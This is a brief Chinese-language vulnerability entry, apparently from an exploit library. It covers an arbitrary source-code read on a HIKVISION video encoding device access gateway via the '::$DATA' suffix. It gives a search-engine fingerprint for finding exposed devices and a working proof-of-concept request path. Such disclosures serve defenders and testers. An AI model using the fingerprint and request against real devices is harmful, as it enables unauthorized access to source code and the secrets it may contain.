HIKVISION 视频编码设备接入网关 $DATA 任意文件读取¶

漏洞描述¶

HIKVISION 视频编码设备接入网关存在配置错误特性，特殊后缀请求php文件可读取源码

漏洞影响¶

HIKVISION 视频编码设备接入网关

网络测绘¶

title="视频编码设备接入网关"

漏洞复现¶

登陆页面

验证POC

/data/login.php::$DATA